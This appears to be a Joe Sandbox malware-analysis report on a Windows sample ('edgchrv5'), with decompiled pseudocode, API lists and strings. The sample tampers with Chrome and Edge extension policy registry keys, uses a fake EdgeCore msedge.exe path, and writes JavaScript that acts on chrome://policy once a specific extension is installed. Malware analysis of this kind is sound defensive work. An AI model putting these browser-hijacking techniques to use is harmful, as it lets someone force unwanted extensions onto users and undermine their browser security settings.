							if( *(_t497 - 0x3fc8) != 0) {
								 *((intOrPtr*)(_t497 - 0x3fcc)) = L"..";
								 *(_t497 - 0x3fd0) = _t497 - 0x3d74;
								while(1) {
									_t478 =  *(_t497 - 0x3fd0);
									_t355 =  *_t478;
									 *((short*)(_t497 - 0x3fd2)) = _t355;
									__eflags = _t355 -  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3fcc))));
									if(_t355 !=  *((intOrPtr*)( *((intOrPtr*)(_t497 - 0x3fcc))))) {
										break;
									}
									__eflags =  *((short*)(_t497 - 0x3fd2));
									if( *((short*)(_t497 - 0x3fd2)) == 0) {
										L150:
										 *(_t497 - 0x3fd8) = 0;
									} else {
										_t478 =  *(_t497 - 0x3fd0);
										_t358 =  *((intOrPtr*)(_t478 + 2));
										 *((short*)(_t497 - 0x3fd4)) = _t358;
										_t136 =  *((intOrPtr*)(_t497 - 0x3fcc)) + 2; // 0x2e
										__eflags = _t358 -  *_t136;
										if(_t358 !=  *_t136) {
											break;
										} else {
											 *(_t497 - 0x3fd0) =  *(_t497 - 0x3fd0) + 4;
											 *((intOrPtr*)(_t497 - 0x3fcc)) =  *((intOrPtr*)(_t497 - 0x3fcc)) + 4;
											__eflags =  *((short*)(_t497 - 0x3fd4));
											if( *((short*)(_t497 - 0x3fd4)) != 0) {
												continue;
											} else {
												goto L150;
											}
										}
									}
									L152:
									 *(_t497 - 0x3fdc) =  *(_t497 - 0x3fd8);
									__eflags =  *(_t497 - 0x3fdc);
									if(__eflags != 0) {
										if(__eflags != 0 && __eflags == 0) {
											0xffc2();
										}
										E01002B40(_t497 - 0x3938, _t497 - 0x3d74);
										_t506 = _t506 + 8;
										if(__eflags != 0 && __eflags == 0) {
										}
									}
									while(1) {
										L159:
										_t406 =  *(_t497 - 0x3fac);
										_t292 = FindNextFileW(_t406, _t497 - 0x3da0);
										__eflags = _t292;
										if(__eflags == 0) {
											break;
										}
										__eflags =  *(_t497 - 0x3da0) - 0x10;
										 *_t292();
										if(__eflags == 0) {
											 *((intOrPtr*)(_t497 - 0x3fb8)) = ".";
											 *(_t497 - 0x3fbc) = _t497 - 0x3d74;
											goto L137;
										}
									}
									_t459 =  *(_t497 - 0x3fac);
									FindClose(_t459);
									if(__eflags != 0 && __eflags == 0) {
										0x8589();
									}
									__eflags = 0;
									 *(_t497 - 0x3730) = 0;
									_push(0x206);
									 *_t459 = _t406 +  *_t459;
									_push(_t497 - 0x372e);
									E01007BE0(_t494);
									_push(_t497 - 0x3938);
									_t414 = _t497 - 0x3730;
									E01002B10(_t414, _t414, L"%s\\Microsoft\\EdgeCore\\%s\\msedge.exe", _t497 - 0x420);
									_t508 = _t506 + 0x1c;
									_t461 = _t497 - 0x3730;
									_t301 = GetFileAttributesW(_t461); // executed
									__eflags = _t301 - 0xffffffff;
									if(__eflags != 0) {
										if(__eflags != 0 && __eflags == 0) {
											0xfeeca783();
										}
										_t302 = _t497 - 0x214;
										 *((intOrPtr*)(_t302 + 0x68))();
										asm("aas");
										 *_t494 =  *_t494 + _t414;
										 *_t461 =  *_t461 + _t414;
										__eflags =  *_t461;
										 *(_t497 - 0x3b50) = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallAllowlist", ??, ??, ??);
										if(__eflags != 0 && __eflags == 0) {
										}
										__eflags =  *(_t497 - 0x3b50);
										_t162 = _t497 + 0x2f;
										 *_t162 = _t461 +  *(_t497 + 0x2f);
										__eflags =  *_t162;
									} else {
										asm("clc");
										if(__eflags < 0) {
											0xeac055d1();
										}
										_t326 = 0;
									}
									__eflags =  *(_t497 - 4) ^ _t497;
									return E01002B7C(_t326, _t390,  *(_t497 - 4) ^ _t497, _t466, _t494, _t495);
									goto L316;
								}
								asm("sbb edx, edx");
								asm("sbb edx, 0xffffffff");
								 *(_t497 - 0x3fd8) = _t478;
								goto L152;
							}
							goto L159;
							L143:
							asm("sbb edx, edx");
							asm("sbb edx, 0xffffffff");
							 *(_t497 - 0x3fc4) = _t458;
							goto L144;
						}
					}
				} else {
					_t284 = 0;
					L133:
					return E01002B7C(_t284, _t390,  *(_t497 - 4) ^ _t497, _t452, _t494, _t495);
				}
				L316:
			}

0x01001953
0x01001953
0x01001953
0x01001953
0x01001953
0x01001956
0x01001957
0x01001959
0x01001959
0x01001966
0x0100196c
0x01001972
0x01001976
0x01001976
0x01001978
0x0100197f
0x01001981
0x01001981
0x01001992
0x01001998
0x01001998
0x010019a2
0x010019a9
0x010019af
0x010019b3
0x010019b3
0x010019bc
0x010019c2
0x010019c6
0x010019c6
0x010019c2
0x010019c7
0x010019c7
0x010019cc
0x010019d1
0x010019d4
0x010019d5
0x010019d7
0x010019e4
0x010019ea
0x010019f0
0x010019f7
0x010019f9
0x010019fa
0x010019fc
0x010019fc
0x01001a0a
0x01001a10
0x01001a11
0x01001a13
0x01001a13
0x01001a15
0x01001a1a
0x01001a1d
0x01001a22
0x01001a23
0x01001a25
0x01001a25
0x01001a23
0x01001a27
0x01001a2b
0x01001a2b
0x01001a35
0x01001a43
0x01001a49
0x01001a4a
0x01001a4c
0x01001a4c
0x01001a53
0x01001a59
0x01001a59
0x01001a5e
0x01001a71
0x01001a76
0x01001a79
0x01001a79
0x01001a8c
0x01001a92
0x01001a98
0x01001a98
0x01001a9d
0x01001aa7
0x01001ab2
0x01001ab9
0x01001abe
0x01001ac8
0x01001ace
0x01001ad1
0x01001ad7
0x01001adb
0x01001adb
0x01001add
0x01001afa
0x01001b06
0x01001b15
0x01001b21
0x01001b27
0x01001b30
0x01001b44
0x01001b50
0x01001b5c
0x01001b5f
0x01001b65
0x01001b65
0x01001b6f
0x01001b73
0x01001b73
0x01001b6f
0x01001b75
0x01001b79
0x01001b79
0x01001b7b
0x01001b7b
0x01001b7f
0x01001b7f
0x01001b8c
0x01001b91
0x01001b94
0x01001b96
0x01001b9c
0x01001b9d
0x01001b9f
0x01001b9f
0x01001ba1
0x01001ba6
0x01001bbb
0x01001bc0
0x01001bd3
0x01001bdf
0x01001bf8
0x01001c04
0x01001c13
0x01001c1f
0x01001c25
0x01001c2e
0x01001c42
0x01001c4e
0x01001c5d
0x01001c63
0x01001c25
0x01001bd3
0x01001c6d
0x01001c74
0x01001c7b
0x01001c81
0x01001c81
0x01001c89
0x01001c8d
0x01001c8d
0x01001c96
0x01001c9f
0x01001ca3
0x01001ca3
0x01001ca4
0x01001caf
0x01001cb6
0x01001cbb
0x01001cbe
0x01001cbf
0x01001cc1
0x01001cc1
0x01001cd6
0x01001cdb
0x01001cde
0x01001cdf
0x01001ce1
0x01001ce1
0x01001cf7
0x01001cfc
0x01001cfe
0x01001cff
0x01001cff
0x01001d01
0x01001d17
0x01001d1c
0x01001d20
0x01001d20
0x01001d36
0x01001d3b
0x01001d3c
0x01001d3e
0x01001d3e
0x01001d56
0x01001d5b
0x01001d5f
0x01001d5f
0x01001d75
0x01001d7a
0x01001d7b
0x01001d7d
0x01001d7d
0x01001d8b
0x01001d90
0x01001d92
0x01001d93
0x01001d93
0x01001d9a
0x01001da0
0x01001da1
0x01001da3
0x01001da3
0x01001da5
0x01001dc0
0x01001dc0
0x01001dc6
0x01001dcc
0x00000000
0x00000000
0x01001dce
0x01001dcf
0x01001dcf
0x01001e2d
0x01001e31
0x01001e31
0x01001e32
0x01001e53
0x01001e59
0x01001ed7
0x01001edd
0x01001edd
0x01001ef6
0x01001efb
0x01001efc
0x01001efe
0x01001efe
0x01001f14
0x01001f1e
0x01001f24
0x01001f30
0x01001f35
0x01001f39
0x01001f39
0x01001f3b
0x01001f3b
0x00000000
0x01001e5b
0x01001e5b
0x01001e5f
0x01001e5f
0x01001e66
0x01001e66
0x01001e73
0x01001e74
0x01001e80
0x01001e87
0x01001e8c
0x01001e8f
0x01001e8f
0x01002050
0x01002051
0x01002054
0x01002054
0x01002058
0x00000000
0x00000000
0x0100205a
0x01002061
0x01002068
0x01002070
0x01002018
0x01002018
0x0100201e
0x01002021
0x0100202e
0x01002031
0x00000000
0x01002033
0x01002033
0x0100203b
0x00000000
0x0100203d
0x0100203d
0x01002043
0x01002047
0x0100204e
0x00000000
0x0100204e
0x0100203b
0x01002072
0x01002072
0x01002072
0x01002072
0x01002089
0x0100208f
0x01002095
0x0100209c
0x010020a2
0x010020b2
0x010020b8
0x010020b8
0x010020be
0x010020c1
0x010020ce
0x010020d1
0x00000000
0x00000000
0x010020d3
0x010020db
0x01002112
0x01002112
0x010020dd
0x010020dd
0x010020e3
0x010020e7
0x010020f4
0x010020f4
0x010020f8
0x00000000
0x010020fa
0x010020fa
0x01002101
0x01002108
0x01002110
0x00000000
0x00000000
0x00000000
0x00000000
0x01002110
0x010020f8
0x01002129
0x0100212f
0x01002135
0x0100213c
0x0100213e
0x01002142
0x01002142
0x01002152
0x01002157
0x0100215a
0x0100215a
0x0100215a
0x0100215f
0x0100215f
0x01002166
0x0100216d
0x01002173
0x01002175
0x00000000
0x00000000
0x01001ff5
0x01001ffa
0x01001ffc
0x01002002
0x01002012
0x00000000
0x01002012
0x01001ffc
0x0100217b
0x01002182
0x01002188
0x0100218c
0x0100218c
0x0100218e
0x01002190
0x01002197
0x0100219b
0x010021a4
0x010021a5
0x010021b3
0x010021c0
0x010021c7
0x010021cc
0x010021cf
0x010021d6
0x010021dc
0x010021df
0x010021ed
0x010021f1
0x010021f1
0x010021f2
0x010021f7
0x010021fa
0x010021fb
0x010021fd
0x010021fd
0x01002210
0x01002216
0x01002216
0x0100221b
0x01002221
0x01002221
0x01002221
0x010021e1
0x010021e1
0x010021e2
0x010021e4
0x010021e4
0x010021e6
0x010021e6
0x01002931
0x0100293b
0x00000000
0x0100293b
0x0100211e
0x01002120
0x01002123
0x00000000
0x01002123
0x00000000
0x0100207e
0x0100207e
0x01002080
0x01002083
0x00000000
0x01002083
0x01002050
0x01001c98
0x01001c98
0x01001f3d
0x01001f4a
0x01001f4a
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma,00000000,000F003F,?), ref: 01001966
RegDeleteValueW.ADVAPI32(?,path), ref: 01001992

Strings

SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100195C

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: DeleteOpenValue
String ID: SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma
API String ID: 2654517830-3224148333
Opcode ID: df23ab64a95c1ebd9a2c5c144281d52da70a79b3e391fa3ae454ec78455e1a8b
Instruction ID: f31d97100c7c15d44c2f9cdeb22790d2cee3377c2001639ef8e8a35209366f62
Opcode Fuzzy Hash: df23ab64a95c1ebd9a2c5c144281d52da70a79b3e391fa3ae454ec78455e1a8b
Instruction Fuzzy Hash: 52D012705082528FEB6746A9881D424FAA06F42723F1442CAD5D5560E7CB35C041CB42

Uniqueness

Uniqueness Score: -1.00%

Function 010015C5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E010015C5(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t43;
				void* _t44;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t63;

				_t63 = __eflags;
				_t56 = __esi;
				_t55 = __edi;
				_t44 = __ecx;
				_t43 = __ebx;
				_push( *((intOrPtr*)(_t57 + __edi + 0x7e)));
			}

0x010015c5
0x010015c5
0x010015c5
0x010015c5
0x010015c5
0x010015c5

APIs

WriteFile.KERNELBASE(000000FF,00000000,00000140,00000000,00000000), ref: 010015ED
CloseHandle.KERNEL32(000000FF), ref: 010015FF
CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,01001404), ref: 01001643

Strings

chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id, xrefs: 010015DB

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id
API String ID: 1065093856-3442544593
Opcode ID: ef918b1b6b0896dc466c0d8bfe2ec7b1cac57c105e34b11aec7ef3afa0658cc1
Instruction ID: 8a4bf16905a1f642e830fd1209f811d3e277e539751f7ef3bf02bce866670143
Opcode Fuzzy Hash: ef918b1b6b0896dc466c0d8bfe2ec7b1cac57c105e34b11aec7ef3afa0658cc1
Instruction Fuzzy Hash: 9CD0A770241206B7D763AFA6CC44BD877225F54710F244714F1B5A60F0C671F5416B6C

Uniqueness

Uniqueness Score: -1.00%

Function 010018DC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E010018DC(void* __ebx, void* __ecx, intOrPtr* __edx, intOrPtr* __edi, void* __esi) {
				long _t267;
				void* _t406;
				intOrPtr* _t464;
				intOrPtr* _t512;
				void* _t513;
				void* _t515;
				intOrPtr _t530;
				intOrPtr _t532;

				_t513 = __esi;
				_t512 = __edi;
				_t464 = __edx;
				_t406 = __ebx;
				 *((intOrPtr*)(__edx + 0x68))();
				asm("aas");
				 *__edi =  *__edi + __ecx;
				 *__edx =  *__edx + __ecx;
				_t530 =  *__edx;
				_t267 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Policies\\Google\\Chrome", ??, ??, ??); // executed
				 *(_t515 - 0x3540) = _t267;
				if(_t530 != 0 && _t530 == 0) {
				}
				_t4 = _t515 + 0x40;
				 *_t4 =  *((intOrPtr*)(_t515 + 0x40)) + _t464;
				_t532 =  *_t4;
			}

0x010018dc
0x010018dc
0x010018dc
0x010018dc
0x010018dc
0x010018df
0x010018e0
0x010018e2
0x010018e2
0x010018ef
0x010018f5
0x010018fb
0x010018fb
0x01001906
0x01001906
0x01001906

APIs

RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome,00000000,000F003F,?), ref: 010018EF

Strings

SOFTWARE\Policies\Google\Chrome, xrefs: 010018E5

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: Open
String ID: SOFTWARE\Policies\Google\Chrome
API String ID: 71445658-2379338332
Opcode ID: 879d14734af84175b65ac6f527679c741670647008f8f4ad999c13283447309b
Instruction ID: 7b0fa1df2e30f6b9b4c8d1b486e40616c4cf81e745c32669a26b28b03c42c6f3
Opcode Fuzzy Hash: 879d14734af84175b65ac6f527679c741670647008f8f4ad999c13283447309b
Instruction Fuzzy Hash: 77D0C93040C2679FE7634B24580E154FEA4BB052B2F1857CAE6A8950D3D7658180C743

Uniqueness

Uniqueness Score: -1.00%

Function 01001200 Relevance: 3.0, APIs: 2, Instructions: 50registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?), ref: 0100121E
RegCreateKeyExW.KERNELBASE(00000002,00000000,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 01001252

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 41e0169ea8b49cbdd5f7a2a4a950cdb4459f3e4adf67dc78d2e67ef18586f4f2
Instruction ID: 5d1e466881314f4bdabf4fcef01be6d05c76abd8c812d3e06d98cecfff276fc7
Opcode Fuzzy Hash: 41e0169ea8b49cbdd5f7a2a4a950cdb4459f3e4adf67dc78d2e67ef18586f4f2
Instruction Fuzzy Hash: 1A019BB9944208B6EB22DB9C9C45FBD77A4AB55720F108244FA50D61C1D634DA60D761

Uniqueness

Uniqueness Score: -1.00%

Function 010011F6 Relevance: 3.0, APIs: 2, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010011F6(void* __eax, void* __ecx) {
				void* _t1;

				_t1 = __eax;
			}

0x010011f6

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?), ref: 0100121E
RegCreateKeyExW.KERNELBASE(00000002,00000000,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 01001252

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 6a78c74a563ebdb477281552ff651ad89bdcf422e31838ee56d8d6c30b9550f0
Instruction ID: 237f0c752a80aff8ef3a536f16f4cda3d4d5308dca2436b9b93eaeaac781c506
Opcode Fuzzy Hash: 6a78c74a563ebdb477281552ff651ad89bdcf422e31838ee56d8d6c30b9550f0
Instruction Fuzzy Hash: 6D01DBF9A4430876EB269BA89C45BBE77A59B49730F008644FA64DB2C1C935E92087A1

Uniqueness

Uniqueness Score: -1.00%

Function 01002C29 Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01002C29(void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t12;
				void* _t20;
				void* _t21;

				_t21 = __eflags;
				E01003E98(_t12, __edi, __esi);
				_t8 = E01003568(_t12, __edx, __edi, _t21);
				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
				E01002BEC( *((intOrPtr*)(_t8 + 0x54))( *((intOrPtr*)(_t8 + 0x58)), 0x100d440, 0xc)); // executed
				 *((intOrPtr*)(_t20 - 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14))))));
				return E01003D36(_t12,  *(_t20 - 4),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t20 - 0x14)))))),  *((intOrPtr*)(_t20 - 0x14)));
			}

0x01002c29
0x01002c30
0x01002c35
0x01002c3a
0x01002c45
0x01002c51
0x01002c5d

APIs

__getptd.LIBCMT ref: 01002C35

Part of subcall function 01003568: __getptd_noexit.LIBCMT ref: 0100356B
Part of subcall function 01003568: __amsg_exit.LIBCMT ref: 01003578

Part of subcall function 01002BEC: __IsNonwritableInCurrentImage.LIBCMT ref: 01002BFF
Part of subcall function 01002BEC: __getptd_noexit.LIBCMT ref: 01002C0F
Part of subcall function 01002BEC: __freeptd.LIBCMT ref: 01002C19
Part of subcall function 01002BEC: ExitThread.KERNEL32 ref: 01002C22

__XcptFilter.LIBCMT ref: 01002C56

Part of subcall function 01003D36: __getptd_noexit.LIBCMT ref: 01003D3E

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 393088965-0
Opcode ID: 0b98724859f1375e897d156d32d0ad18701d52f3bbc109bf5177df51490ff775
Instruction ID: 25172b4bb950764676851d522808606f1abc6e3987ba35e4af8fbcbeaf9fb2d0
Opcode Fuzzy Hash: 0b98724859f1375e897d156d32d0ad18701d52f3bbc109bf5177df51490ff775
Instruction Fuzzy Hash: 01E0ECB5904601AFFB1AFBA0C849FAD7765AF55301F210449E1425F2F0CA75AD40DB21

Uniqueness

Uniqueness Score: -1.00%

Function 01002CC1 Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01002CC1(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				DWORD* _v8;
				void* _t24;
				DWORD* _t29;
				intOrPtr* _t31;
				void* _t33;
				void* _t35;
				void* _t46;
				char _t47;
				void* _t49;
				void* _t50;

				_t49 = __esi;
				_t46 = __edi;
				_t45 = __edx;
				_t35 = __ebx;
				 *((intOrPtr*)(__eax + 4)) = __edx;
				E01003582(__ebx, __edi, __esi, __eflags);
				_t59 =  *0x101e424;
				if( *0x101e424 != 0) {
					_t33 = E01003940(_t59, 0x101e424);
					_pop(_t38);
					_t60 = _t33;
					if(_t33 != 0) {
						 *0x101e424(); // executed
					}
				}
				E01002C29(_t45, _t46, _t49, _t60); // executed
				asm("int3");
				_push(_t35);
				_push(_t46);
				_t47 = _a12;
				_v8 = 0;
				_t61 = _t47;
				if(_t47 != 0) {
					_push(_t49);
					E0100337A();
					_t50 = E010041EA(1, 0x214);
					__eflags = _t50;
					if(__eflags == 0) {
						L12:
						_push(_t50);
						E01004117(0, _t47, _t50, __eflags);
						__eflags = _v8;
						if(_v8 != 0) {
							E010040F4(_v8);
						}
						_t24 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E01003568(0, _t45, _t47, __eflags) + 0x6c)));
						_push(_t50);
						E01003408(0, _t47, _t50, __eflags);
						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t50 + 0x58)) = _a16;
						_t29 = _a24;
						 *((intOrPtr*)(_t50 + 0x54)) = _t47;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 =  &_a12;
						}
						_t24 = CreateThread(_a4, _a8, E01002C6A, _t50, _a20, _t29); // executed
						__eflags = _t24;
						if(__eflags == 0) {
							_v8 = GetLastError();
							goto L12;
						}
					}
				} else {
					_t31 = E010040CE(_t61);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t31 = 0x16;
					E010043BB(_t45, _t47, _t49);
					_t24 = 0;
				}
				return _t24;
			}

0x01002cc1
0x01002cc1
0x01002cc1
0x01002cc1
0x01002cc1
0x01002cc4
0x01002cc9
0x01002cd0
0x01002cd7
0x01002cdc
0x01002cdd
0x01002cdf
0x01002ce1
0x01002ce1
0x01002cdf
0x01002ce7
0x01002cec
0x01002cf3
0x01002cf4
0x01002cf5
0x01002cfa
0x01002cfd
0x01002cff
0x01002d1d
0x01002d1e
0x01002d2f
0x01002d33
0x01002d35
0x01002d81
0x01002d81
0x01002d82
0x01002d88
0x01002d8b
0x01002d90
0x01002d95
0x01002d96
0x01002d96
0x01002d37
0x01002d3c
0x01002d3f
0x01002d40
0x01002d48
0x01002d4c
0x01002d4f
0x01002d54
0x01002d57
0x01002d59
0x01002d5b
0x01002d5b
0x01002d6e
0x01002d74
0x01002d76
0x01002d7e
0x00000000
0x01002d7e
0x01002d76
0x01002d01
0x01002d01
0x01002d06
0x01002d07
0x01002d08
0x01002d09
0x01002d0a
0x01002d0b
0x01002d11
0x01002d19
0x01002d19
0x01002d9c

APIs

__freefls@4.LIBCMT ref: 01002CC4

Part of subcall function 01003582: __lock.LIBCMT ref: 0100360E
Part of subcall function 01003582: InterlockedDecrement.KERNEL32(?), ref: 01003620
Part of subcall function 01003582: __lock.LIBCMT ref: 01003647
Part of subcall function 01003582: ___removelocaleref.LIBCMT ref: 0100365C
Part of subcall function 01003582: ___freetlocinfo.LIBCMT ref: 01003678

__IsNonwritableInCurrentImage.LIBCMT ref: 01002CD7

Part of subcall function 01003940: __FindPESection.LIBCMT ref: 0100399B

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: __lock$CurrentDecrementFindImageInterlockedNonwritableSection___freetlocinfo___removelocaleref__freefls@4
String ID:
API String ID: 80049855-0
Opcode ID: 83d116db6f6d927cb89be1401a50c52ee091568230e945a37a921bf8b4acbed4
Instruction ID: ca6c2b50e87649f31bf20bb38a4574f24968a51e29f89d7bb6d696416515deb2
Opcode Fuzzy Hash: 83d116db6f6d927cb89be1401a50c52ee091568230e945a37a921bf8b4acbed4
Instruction Fuzzy Hash: E7D012300402078FF72B3BA5E90CA5C7AF4FB10111F15445967C0480D5CE3DD044C612

Uniqueness

Uniqueness Score: -1.00%

Function 01003A81 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01003A81(int _a4) {

				E01003A56(_a4);
				ExitProcess(_a4);
			}

0x01003a89
0x01003a92

APIs

___crtCorExitProcess.LIBCMT ref: 01003A89

Part of subcall function 01003A56: GetModuleHandleW.KERNEL32(mscoree.dll,?,01003A8E,?,?,0100780B,000000FF,0000001E,?,010041B6,?,00000001,?,?,01005C3C,00000018), ref: 01003A60
Part of subcall function 01003A56: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01003A70

ExitProcess.KERNEL32 ref: 01003A92

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 9b3f6e549bdc8304719d53b9da9fe4bf85e1af7fb789f886b7239b706b472250
Instruction ID: baf91f1b8889949574a5d4255e53edcb7ed0db89a3ef2f8a66e6118fdd5c4073
Opcode Fuzzy Hash: 9b3f6e549bdc8304719d53b9da9fe4bf85e1af7fb789f886b7239b706b472250
Instruction Fuzzy Hash: E4B09231004108BFEB236F12DC098893F6AEB826A0F509020F89809170DF72ADA2DA94

Uniqueness

Uniqueness Score: -1.00%

Function 01005A68 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

